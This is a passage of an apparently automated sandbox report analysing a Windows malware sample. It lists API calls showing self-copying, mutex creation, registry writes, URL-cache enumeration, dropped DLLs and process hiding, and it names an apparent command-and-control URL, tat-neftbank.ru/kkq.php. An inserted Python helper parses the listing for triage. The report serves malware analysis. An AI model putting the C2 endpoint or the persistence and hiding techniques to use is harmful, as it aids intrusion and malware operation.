                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB
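The per-function "APIs" listings above are easiest to act on once the call arguments are decoded: the RegCreateKeyExA block opens its key with samDesired 0x00020006 (KEY_WRITE, consistent with the autostart-key signature in the summary), the RegOpenKeyExA block uses 0x00020019 (KEY_READ), the CreateFileA block asks for 0xC0000000 (GENERIC_READ|GENERIC_WRITE) and seeks with dwMoveMethod 2 (FILE_END) before WriteFile, so it appends rather than overwrites, and the _sleep before the tat-neftbank.ru string is 0x927C0 = 600000 ms. The following Python is an added triage helper, not code from Joe Sandbox or from this report: it parses the "APIs" and "String ID" lines exactly as they are printed here and tags each function block. The sample text is constructed from six of the blocks above, condensed to their APIs and String ID lines; the tag names are my own.

```python
"""Triage helper for the per-function 'APIs' listings of a Joe Sandbox report.
Added example, not part of Joe Sandbox or of the report; tag names are my own."""
import re
from dataclasses import dataclass, field

# Constructed sample: 'APIs' and 'String ID' lines of six function blocks copied
# from the report, with each block's String ID line moved under its APIs.
SAMPLE = """APIs
• lstrlenA.KERNEL32(?), ref: 00404492
• LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
• sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
• String ID: %s%c%c
APIs
• RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
• RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
• RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
APIs
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
APIs
• CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
• WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
APIs
• GetWindowTextA.USER32(?,?,?), ref: 004018E2
• _sleep.CRTDLL(00000000), ref: 00401985
• String ID: Microsoft Internet Explorer
APIs
  • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
• _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
• String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
"""

API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
                    r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")
STR_RE = re.compile(r"^\s*•\s*String ID:\s*(.*?)\s*$")

@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    subcall: bool  # True for 'Part of subcall function' lines (a callee's APIs)

@dataclass
class Func:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)

def parse_listing(text):
    """One Func per 'APIs' header; arguments are kept as the hex text printed."""
    funcs = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            funcs.append(Func())
        elif funcs and (m := API_RE.match(line)):
            api, mod, args, ref = m.groups()
            funcs[-1].calls.append(Call(api, mod, args.split(","), ref, "Part of subcall" in line))
        elif funcs and (m := STR_RE.match(line)):
            funcs[-1].strings += [s for s in m.group(1).split("$") if s]  # '$' joins strings
    return funcs

# Access-right bits from winreg.h / winnt.h, enough to read the masks in the report.
KEY_RIGHTS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
              0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20000: "READ_CONTROL"}
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}

def decode(mask_hex, table):
    v = int(mask_hex, 16)
    return "|".join(n for bit, n in table.items() if v & bit)

def classify(func):
    """Behaviour tags for one function block (tag names are this example's own)."""
    names = {c.api for c in func.calls}
    own = {c.api for c in func.calls if not c.subcall}
    first = lambda api: next(c for c in func.calls if c.api == api)
    tags = []
    if {"RegCreateKeyExA", "RegSetValueExA"} <= names:   # samDesired is argument 6
        tags.append("registry-write:" + decode(first("RegCreateKeyExA").args[5], KEY_RIGHTS))
    if {"RegOpenKeyExA", "RegQueryValueExA"} <= names:   # samDesired is argument 4
        tags.append("registry-read:" + decode(first("RegOpenKeyExA").args[3], KEY_RIGHTS))
    if {"CreateFileA", "WriteFile"} <= own:
        # SetFilePointer with dwMoveMethod 2 (FILE_END) before WriteFile means append.
        append = any(c.api == "SetFilePointer" and c.args[3] == "00000002" for c in func.calls)
        tags.append(("file-append:" if append else "file-write:")
                    + decode(first("CreateFileA").args[1], GENERIC))
    if "GetWindowTextA" in names and any("Internet Explorer" in s for s in func.strings):
        tags.append("ie-window-title-check")
    for s in func.strings:
        if s.startswith(("http://", "https://")):
            tags.append("embedded-url:" + s)
    if "_sleep" in own:
        tags.append("sleep-ms:%d" % int(first("_sleep").args[0], 16))
    if "sprintf" in own and any("%" in s for s in func.strings):
        tags.append("format-build:" + func.strings[0])
    return tags

def summarize(text):
    """Map each block's first own-call address to its tags."""
    return {next(c.ref for c in f.calls if not c.subcall): classify(f)
            for f in parse_listing(text)}

if __name__ == "__main__":
    for ref, tags in summarize(SAMPLE).items():
        print(ref, tags)
```

The tags only restate what the listing shows (access masks, seek mode, strings next to the calls); which key is written and what the appended file is cannot be read from these lines, so the helper deliberately does not guess them.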

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2
                            execution_graph 2693 403840 printf 2694 403880 2693->2694 2695 403884 printf 2694->2695 2696 40386d printf 2694->2696 2696->2694 2702 4052e0 2703 4052ec strcat strcat 2702->2703 2719 40431f 2703->2719 2706 405360 2707 40537c CreateProcessA 2706->2707 2708 4053ac CloseHandle sprintf 2707->2708 2718 405469 2707->2718 2710 405413 2708->2710 2709 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2711 4054d0 2709->2711 2712 4053e5 FindWindowA 2710->2712 2713 40541d 2710->2713 2712->2713 2714 405402 Sleep 2712->2714 2715 405421 Sleep 2713->2715 2713->2718 2714->2710 2716 405434 Sleep 2715->2716 2717 40543e GetWindowTextA 2715->2717 2716->2717 2717->2718 2718->2709 2720 404341 GetCurrentThreadId GetThreadDesktop 2719->2720 2721 404364 CreateDesktopA 2719->2721 2722 40438e SetThreadDesktop 2720->2722 2723 40435f memset 2720->2723 2721->2722 2721->2723 2722->2723 2723->2706 2723->2707 2826 401581 2827 4015c8 2826->2827 2828 4015a2 rand 2827->2828 2829 4015cc 2827->2829 2828->2827 2724 403562 GetModuleFileNameA 2725 403588 2724->2725 2986 402ba3 2988 402a89 2986->2988 2987 402cd2 2988->2987 2989 402cad GetCurrentProcessId 2988->2989 2990 402b2a GetModuleHandleA GetProcAddress 2988->2990 2989->2988 2990->2988 2726 4077e4 2727 407808 2726->2727 2734 40789e 2726->2734 2728 407820 SetFocus 2727->2728 2729 40782b 2727->2729 2727->2734 2728->2729 2730 407833 SetFocus 2729->2730 2731 40783e 2729->2731 2730->2731 2732 407857 2731->2732 2733 40784c SetFocus 2731->2733 2735 40786a 2732->2735 2736 40785f SetFocus 2732->2736 2733->2732 2739 407910 2734->2739 2740 4078fe CallWindowProcA 2734->2740 2737 407872 SetFocus 2735->2737 2738 40787d 2735->2738 2736->2735 2737->2738 2738->2734 2741 407885 SetFocus 2738->2741 2740->2739 2741->2734 2830 405c09 lstrlenA GetTickCount srand 2863 40509b 2830->2863 2835 405f54 2836 405caf ExpandEnvironmentStringsA 2877 40570c 2836->2877 2839 405ceb strcat strcat 2840 40431f 4 API calls 2839->2840 2841 405d14 memset 
2840->2841 2842 405d72 CreateProcessA 2841->2842 2843 405d56 2841->2843 2844 405da2 CloseHandle sprintf 2842->2844 2845 405f24 DeleteFileA TerminateProcess CloseHandle 2842->2845 2843->2842 2846 405e09 2844->2846 2845->2835 2847 405e13 2846->2847 2848 405ddb FindWindowA 2846->2848 2847->2845 2850 405e1b Sleep GetWindowTextA 2847->2850 2848->2847 2849 405df8 Sleep 2848->2849 2849->2846 2851 405e50 2850->2851 2851->2845 2916 405613 2851->2916 2853 405e6b 2853->2845 2854 405e76 CopyFileA 2853->2854 2855 403619 5 API calls 2854->2855 2856 405e9c DeleteFileA lstrlenA strncmp 2855->2856 2857 405ec6 lstrlenA 2856->2857 2858 405eef 2856->2858 2924 403743 CreateFileA 2857->2924 2860 403743 4 API calls 2858->2860 2861 405eea LocalFree 2860->2861 2861->2845 2868 4050ea 2863->2868 2864 4050b6 sprintf 2927 4041f4 2864->2927 2865 4050f8 2867 4041f4 4 API calls 2865->2867 2869 40510e 2867->2869 2868->2864 2868->2865 2930 4041c3 lstrlenA 2869->2930 2872 40429c RegOpenKeyExA 2873 4042e0 RegQueryValueExA 2872->2873 2874 4042dc 2872->2874 2875 404304 RegCloseKey 2873->2875 2876 4042f8 RegCloseKey 2873->2876 2874->2835 2874->2836 2875->2874 2876->2874 2878 4079e4 2877->2878 2879 405719 GetTempPathA 2878->2879 2880 405746 2879->2880 2880->2880 2938 4015ea 2880->2938 2883 405798 strcat 2884 4057ac rand 2883->2884 2885 4057e7 rand 2884->2885 2886 4057be rand sprintf 2884->2886 2887 4057f9 strcat 2885->2887 2888 40580d strcat rand 2885->2888 2886->2885 2887->2888 2889 405839 strcat 2888->2889 2890 40584d rand 2888->2890 2889->2890 2891 405888 sprintf rand 2890->2891 2892 40585f rand sprintf 2890->2892 2893 4058c3 strcat 2891->2893 2894 4058d7 strcat rand 2891->2894 2892->2891 2893->2894 2895 405911 strcat rand 2894->2895 2896 4058fd strcat 2894->2896 2897 405966 strcat rand 2895->2897 2898 40593d rand sprintf 2895->2898 2896->2895 2899 4059a0 strcat rand 2897->2899 2900 40598c strcat 2897->2900 2898->2897 2901 4059d2 strcat 2899->2901 2902 4059e6 strcat rand 2899->2902 2900->2899 
2901->2902 2903 405a20 sprintf rand 2902->2903 2904 405a0c strcat 2902->2904 2905 405a70 strcat rand 2903->2905 2906 405a5c strcat 2903->2906 2904->2903 2907 405ab0 rand sprintf rand 2905->2907 2908 405a9c strcat 2905->2908 2906->2905 2909 405af3 strcat 2907->2909 2910 405b07 strcat rand 2907->2910 2908->2907 2909->2910 2911 405b39 strcat 2910->2911 2912 405b4d rand 2910->2912 2911->2912 2913 405b88 strcat CreateFileA lstrlenA WriteFile CloseHandle 2912->2913 2914 405b5f rand sprintf 2912->2914 2915 405c04 2913->2915 2914->2913 2915->2835 2915->2839 2917 4079e4 2916->2917 2918 405620 FindFirstUrlCacheEntryA 2917->2918 2919 405663 _stricmp 2918->2919 2920 405685 2918->2920 2919->2920 2921 4056a7 FindNextUrlCacheEntryA 2919->2921 2920->2853 2921->2920 2922 4056c9 _stricmp 2921->2922 2922->2920 2923 4056fb 2922->2923 2923->2921 2925 403775 2924->2925 2926 403779 SetFilePointer WriteFile CloseHandle 2924->2926 2925->2861 2926->2925 2933 40421f RegCreateKeyExA 2927->2933 2931 40421f 4 API calls 2930->2931 2932 4041ee InterlockedIncrement memset 2931->2932 2932->2872 2934 404262 RegSetValueExA 2933->2934 2935 404219 2933->2935 2936 404288 RegCloseKey 2934->2936 2937 40427c RegCloseKey 2934->2937 2935->2868 2936->2935 2937->2935 2939 401634 2938->2939 2940 401638 strcat sprintf rand 2939->2940 2941 40160e rand 2939->2941 2940->2883 2940->2884 2941->2939 2991 4037aa 2992 4037c8 printf printf 2991->2992 2994 40380d 2992->2994 2995 4037fa printf 2994->2995 2997 403812 printf 2994->2997 2995->2994 2998 4035ab 2999 4079e4 2998->2999 3000 4035b8 vsprintf 2999->3000 3003 4035f9 MessageBoxA 3000->3003 3002 4035ea 3003->3002 2742 40686c lstrlenA 2743 405f5b 9 API calls 2742->2743 2744 40689a 2743->2744 2745 4068a1 WinExec 2744->2745 2746 4068a9 2744->2746 2745->2746 2942 40328f 2943 402efd 2942->2943 2944 402cd7 3 API calls 2943->2944 2945 4033ce 2943->2945 2946 40289a 4 API calls 2943->2946 2947 4030e5 GetModuleHandleA 2943->2947 2948 40314c VirtualQuery 2943->2948 2950 402f98 
GlobalMemoryStatus 2943->2950 2951 402f6f IsBadReadPtr 2943->2951 2952 403059 CloseHandle 2943->2952 2944->2943 2946->2943 2947->2943 2948->2943 2949 4031b1 IsBadWritePtr 2948->2949 2949->2943 2950->2943 2951->2943 2952->2943 2953 407892 2954 40789e 2953->2954 2955 407910 2954->2955 2956 4078fe CallWindowProcA 2954->2956 2956->2955 3004 405133 10 API calls 3005 40429c 4 API calls 3004->3005 3006 405264 3005->3006 3007 405278 3006->3007 3008 40526b LocalFree 3006->3008 3010 40509b 6 API calls 3007->3010 3009 4054d0 3008->3009 3011 40527d ExpandEnvironmentStringsA 3010->3011 3030 404532 3011->3030 3014 4052d3 LocalFree 3014->3009 3015 4052ec strcat strcat 3016 40431f 4 API calls 3015->3016 3017 405315 memset 3016->3017 3018 405360 3017->3018 3019 40537c CreateProcessA 3017->3019 3018->3019 3020 4053ac CloseHandle sprintf 3019->3020 3029 405469 3019->3029 3022 405413 3020->3022 3021 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3021->3009 3023 4053e5 FindWindowA 3022->3023 3024 40541d 3022->3024 3023->3024 3025 405402 Sleep 3023->3025 3026 405421 Sleep 3024->3026 3024->3029 3025->3022 3027 405434 Sleep 3026->3027 3028 40543e GetWindowTextA 3026->3028 3027->3028 3028->3029 3029->3021 3031 40453f 3030->3031 3032 403619 5 API calls 3031->3032 3033 404570 3032->3033 3034 404579 3033->3034 3035 404596 lstrlenA LocalAlloc GetTempPathA 3033->3035 3036 404589 LocalFree 3033->3036 3034->3014 3034->3015 3037 404604 3035->3037 3036->3034 3037->3037 3038 4015ea rand 3037->3038 3039 40461d strcat sprintf rand 3038->3039 3040 404655 strcat 3039->3040 3041 404668 rand 3039->3041 3040->3041 3042 40467a rand sprintf 3041->3042 3043 40469d rand 3041->3043 3042->3043 3044 4046bb strcat 3043->3044 3045 4046ce strcat rand 3043->3045 3044->3045 3046 4046f3 strcat 3045->3046 3047 404706 rand 3045->3047 3046->3047 3048 404741 sprintf rand 3047->3048 3049 40471e rand sprintf 3047->3049 3050 404770 strcat 3048->3050 3051 404783 strcat rand 3048->3051 3049->3048 3050->3051 3052 
4047a8 strcat 3051->3052 3053 4047bb strcat rand 3051->3053 3052->3053 3054 4047e6 rand sprintf 3053->3054 3055 404809 rand sprintf sprintf rand 3053->3055 3054->3055 3056 404859 rand sprintf 3055->3056 3057 40487c rand 3055->3057 3056->3057 3058 404894 strcat 3057->3058 3059 4048a7 rand 3057->3059 3058->3059 3060 4048b9 strcat 3059->3060 3061 4048cc rand 3059->3061 3060->3061 3062 4048f1 sprintf rand 3061->3062 3063 4048de strcat 3061->3063 3064 404926 strcat 3062->3064 3065 404939 rand 3062->3065 3063->3062 3064->3065 3066 40494b strcat 3065->3066 3067 40495e rand 3065->3067 3066->3067 3068 404976 rand sprintf 3067->3068 3069 404999 3067->3069 3068->3069 3075 4049a3 3069->3075 3096 404b12 3069->3096 3070 404b07 3072 404c87 strcat rand 3070->3072 3071 4043bf 2 API calls 3071->3096 3073 404cac strcat 3072->3073 3074 404cbf rand 3072->3074 3073->3074 3078 404cd1 strcat 3074->3078 3079 404ce4 rand 3074->3079 3075->3070 3076 404a4b sprintf rand 3075->3076 3077 4049d9 sprintf 3075->3077 3080 404a82 strcat 3076->3080 3081 404a95 rand 3076->3081 3077->3075 3078->3079 3083 404cf6 strcat 3079->3083 3084 404d09 strcat rand 3079->3084 3080->3081 3085 404aa7 strcat 3081->3085 3086 404aba rand 3081->3086 3082 404b47 sprintf 3082->3096 3083->3084 3087 404d34 rand sprintf 3084->3087 3088 404d57 rand 3084->3088 3085->3086 3086->3075 3089 404acc strcat 3086->3089 3087->3088 3090 404d69 strcat 3088->3090 3091 404d7c rand 3088->3091 3089->3075 3090->3091 3092 404da1 rand 3091->3092 3093 404d8e strcat 3091->3093 3094 404db9 strcat 3092->3094 3095 404dcc rand 3092->3095 3093->3092 3094->3095 3097 404e01 strcat rand 3095->3097 3098 404dde rand sprintf 3095->3098 3096->3071 3096->3072 3096->3082 3123 40447a lstrlenA LocalAlloc 3096->3123 3100 404e2c strcat 3097->3100 3101 404e3f strcat rand 3097->3101 3098->3097 3100->3101 3103 404e64 strcat 3101->3103 3104 404e77 strcat rand 3101->3104 3103->3104 3107 404ea2 strcat 3104->3107 3108 404eb5 sprintf rand 3104->3108 3105 404c02 rand 3109 
404c14 strcat 3105->3109 3110 404c27 rand 3105->3110 3106 404bef strcat 3106->3105 3107->3108 3113 404ee3 strcat 3108->3113 3114 404ef6 strcat rand 3108->3114 3109->3110 3111 404c39 strcat 3110->3111 3112 404c4c LocalFree 3110->3112 3111->3112 3112->3096 3113->3114 3115 404f27 strcat 3114->3115 3116 404f3a rand sprintf rand 3114->3116 3115->3116 3117 404f77 strcat 3116->3117 3118 404f8a strcat rand 3116->3118 3117->3118 3119 404fb5 strcat 3118->3119 3120 404fc8 rand 3118->3120 3119->3120 3121 404fda rand sprintf 3120->3121 3122 404ffd 7 API calls 3120->3122 3121->3122 3122->3034 3124 4044b6 3123->3124 3125 4044d9 sprintf 3124->3125 3126 40452a sprintf rand 3124->3126 3125->3124 3126->3105 3126->3106 3127 401b33 3130 401aa4 3127->3130 3128 401b13 3129 401ae6 sprintf 3132 40129c 3129->3132 3130->3128 3130->3129 3133 4012a9 CreateFileA 3132->3133 3134 4079e4 3132->3134 3135 4012d7 3133->3135 3136 4012db ReadFile CloseHandle 3133->3136 3134->3133 3135->3128 3136->3135 3137 4036b3 CreateFileA 3138 4036e7 SetFilePointer 3137->3138 3139 4036e3 3137->3139 3140 403701 3138->3140 3140->3140 3141 403708 WriteFile WriteFile CloseHandle 3140->3141 3141->3139 2747 406ff6 2748 4071a4 2747->2748 2749 40701f 2747->2749 2750 40717e 2748->2750 2751 4071be DestroyWindow 2748->2751 2752 407021 2749->2752 2753 40702f 2749->2753 2751->2750 2756 407184 2752->2756 2757 40702a 2752->2757 2754 407289 GetWindowTextA 2753->2754 2755 40703a 2753->2755 2761 4072c9 GetWindowTextA 2754->2761 2762 4072a9 MessageBoxA SetFocus 2754->2762 2759 407041 2755->2759 2760 40705c 2755->2760 2756->2750 2763 407198 PostQuitMessage 2756->2763 2758 4077cc DefWindowProcA 2757->2758 2758->2750 2759->2757 2759->2758 2767 4071cb 2759->2767 2766 407149 2760->2766 2803 405ffa 2760->2803 2764 407322 2761->2764 2765 407302 MessageBoxA SetFocus 2761->2765 2762->2750 2763->2750 2771 407337 MessageBoxA SetFocus 2764->2771 2781 407357 2764->2781 2765->2750 2766->2750 2810 406075 2766->2810 2767->2750 2773 407224 
SetTextColor 2767->2773 2776 407233 SetTextColor 2767->2776 2771->2750 2772 405ffa 3 API calls 2775 40709b GetWindowRect 2772->2775 2774 40723d SetBkColor CreateBrushIndirect 2773->2774 2774->2750 2775->2766 2778 4070be GetWindowRect 2775->2778 2776->2774 2777 4073a7 sprintf GetWindowTextA 2779 40740f sprintf GetWindowTextA 2777->2779 2780 4073ef MessageBoxA SetFocus 2777->2780 2778->2766 2783 4070d4 2778->2783 2784 407477 sprintf GetWindowTextA 2779->2784 2785 407457 MessageBoxA SetFocus 2779->2785 2780->2750 2781->2777 2782 407376 MessageBoxA SetFocus 2781->2782 2782->2750 2783->2766 2786 407112 MoveWindow 2783->2786 2787 4074d9 2784->2787 2788 4074b9 MessageBoxA SetFocus 2784->2788 2785->2750 2786->2766 2789 4074ee MessageBoxA SetFocus 2787->2789 2792 40750e 2787->2792 2788->2750 2789->2750 2790 40755e sprintf GetWindowTextA 2791 4075a6 MessageBoxA SetFocus 2790->2791 2794 4075c6 2790->2794 2791->2750 2792->2790 2793 40752d MessageBoxA SetFocus 2792->2793 2793->2750 2795 407627 sprintf CreateFileA SetFilePointer 2794->2795 2796 4075e5 MessageBoxA SetFocus 2794->2796 2797 40768e 2795->2797 2796->2750 2797->2797 2798 407695 WriteFile WriteFile 2797->2798 2799 4076db 2798->2799 2799->2799 2800 4076e2 6 API calls 2799->2800 2801 40776e 2800->2801 2801->2801 2802 407775 WriteFile WriteFile CloseHandle ShowWindow 2801->2802 2802->2750 2804 4079e4 2803->2804 2805 406007 GetWindow 2804->2805 2806 406020 2805->2806 2807 406024 2806->2807 2808 406028 GetClassNameA 2806->2808 2809 40605f GetWindow 2806->2809 2807->2772 2808->2806 2809->2806 2811 405ffa 3 API calls 2810->2811 2812 406096 2811->2812 2813 405ffa 3 API calls 2812->2813 2814 4060a3 10 API calls 2813->2814 2815 406224 SendMessageA 2814->2815 2816 40623a SendMessageA 2814->2816 2817 40624e CreateWindowExA CreateWindowExA 2815->2817 2816->2817 2818 406333 2817->2818 2819 4062cb sprintf SendMessageA sprintf SendMessageA 2818->2819 2820 40633c 34 API calls 2818->2820 2819->2818 2820->2750 2957 401219 2958 40121f 

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
